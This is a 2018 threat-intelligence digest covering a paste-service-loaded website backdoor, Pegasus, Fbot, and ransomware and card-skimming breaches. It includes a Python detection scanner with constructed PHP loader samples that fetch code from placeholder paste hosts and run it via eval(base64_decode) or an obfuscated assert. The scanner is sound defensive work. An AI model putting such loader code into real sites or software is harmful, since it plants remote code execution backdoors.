Cyware Daily Threat Intelligence September 19, 2018

Top Malware Reported in the Last 24 Hours

Website backdoor
A new website backdoor has been discovered that, instead of embedding its code in a web page like other backdoors, loads it at runtime from an online clipboard (paste) service. The page itself carries only a small loader, which fetches the remote content; once the downloaded payload is decrypted it turns out to be the FilesMan backdoor, which lets the attacker access, modify and reinfect the website at any time after the initial compromise. Because the malicious logic is never stored on the server, a scan of the on-disk files alone will only ever see the loader.
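A practitioner wanting to catch loaders of this kind can look for the combination the summary describes: a remote fetch (typically of a paste-service URL), an optional decode/decrypt layer, and a path that executes the result as PHP. The following heuristic scanner is an added example written for this page, not code from the original report or from any named tool; the PHP snippets and the list of paste-service hosts are constructed and hypothetical.

```python
"""Heuristic scan of PHP source for backdoors that fetch their code from a
remote paste/clipboard service and execute it, instead of embedding it.
Added example; the PHP samples and paste-host list below are constructed."""
import re

# Functions (or string literals naming them) that pull content over the network.
# Matching the bare name, not "name(", also catches $f = 'file_get_contents'; $f(...)
REMOTE_FETCH = re.compile(
    r"\b(file_get_contents|curl_exec|curl_init|fopen|fsockopen|stream_get_contents)\b", re.I)
# Any quoted http(s) URL; group 1 is the host, checked against PASTE_HOSTS
URL_LITERAL = re.compile(r"""['"]https?://([^/'"\s]+)[^'"\s]*['"]""", re.I)
# Decoding / decryption layers typically wrapped around the fetched payload
DECODE = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|openssl_decrypt|hex2bin)\b", re.I)
# Direct ways of running a string as PHP
EXECUTE = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
# Variable function call, e.g. $g($x), used to hide eval/assert behind a string
DYNAMIC_CALL = re.compile(r"\$\w+\s*\(")

# Hypothetical paste/clipboard hosts; extend with what your environment sees
PASTE_HOSTS = ("paste.example.invalid", "clipboard.example.invalid")


def _is_paste_host(host):
    return any(host == p or host.endswith("." + p) for p in PASTE_HOSTS)


def scan_php(source):
    """Return the individual indicators found in one PHP file."""
    hosts = {m.group(1).lower() for m in URL_LITERAL.finditer(source)}
    return {
        "remote_fetch": bool(REMOTE_FETCH.search(source)),
        "paste_hosts": sorted(h for h in hosts if _is_paste_host(h)),
        "decode": bool(DECODE.search(source)),
        "execute": bool(EXECUTE.search(source)),
        "dynamic_call": bool(DYNAMIC_CALL.search(source)),
    }


def is_suspicious(source):
    """Flag when remote content is fetched and then run as code, either via an
    explicit eval/assert or via a decode layer feeding a variable function call.
    A paste host raises confidence but is not required."""
    f = scan_php(source)
    runs_payload = f["execute"] or (f["dynamic_call"] and f["decode"])
    return f["remote_fetch"] and runs_payload


# Constructed samples (not real malware): a plain loader, an obfuscated loader,
# and a benign API client that also uses file_get_contents.
LOADER_SAMPLE = """<?php
$u = "https://paste.example.invalid/raw/abc123";
$c = file_get_contents($u);
eval(base64_decode($c));
"""

OBFUSCATED_SAMPLE = """<?php
$f = 'file_get_contents';
$c = $f('https://clip.clipboard.example.invalid/raw/xyz');
$x = gzinflate(base64_decode($c));
$g = 'ass' . 'ert';
$g($x);
"""

BENIGN_SAMPLE = """<?php
$json = file_get_contents("https://api.example.invalid/v1/status");
$data = json_decode($json, true);
echo $data["ok"];
"""

if __name__ == "__main__":
    for name, src in (("loader", LOADER_SAMPLE),
                      ("obfuscated", OBFUSCATED_SAMPLE),
                      ("benign", BENIGN_SAMPLE)):
        print(name, "SUSPICIOUS" if is_suspicious(src) else "clean", scan_php(src))
```

The indicator split matters in practice: `file_get_contents` of a remote URL on its own is common in legitimate code, so the scanner only alerts when the fetched data can reach an execution sink. Run it over the web root after a cleanup to find loaders that survived a signature scan, then pull the remote URL (from an isolated host) to recover the actual payload for analysis.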

Pegasus
The NSO Group's Pegasus spyware has been found deployed against victims in 45 countries. The malware runs on both Android and iOS devices and can record conversations, steal private messages and exfiltrate photos. At least 10 operators of Pegasus have deployed it against targets outside their own country's borders.

Fbot
Fbot is a new Mirai variant that, instead of conducting DDoS attacks, hunts for devices infected with ADB-based cryptomining malware and removes it. After tracking down the miner's processes, killing them and scrubbing away traces of the earlier infection, the bot deletes itself.

Top Breaches Reported in the Last 24 Hours

VON Canada attack
VON Canada was hit by a ransomware attack. The nursing organization discovered the attack on September 1 and immediately shut down all of its systems to limit the damage. VON's phone and email systems were included in the shutdown, which led to some delays and missed appointments. VON has approximately 13,000 clients in Nova Scotia, where it has since returned to normal operations.

ABS-CBN hacked
The Philippines-based media giant ABS-CBN's online store was hacked. The cybercriminals behind the attack planted payment-skimming malware that collected the financial data of customers buying merchandise from the store and sent it to a collection server registered in Irkutsk, Russia. The method, browser-side interception of card data during checkout, is the same one used in the recent British Airways breach, and suspicion points to Magecart, the group implicated in that attack.
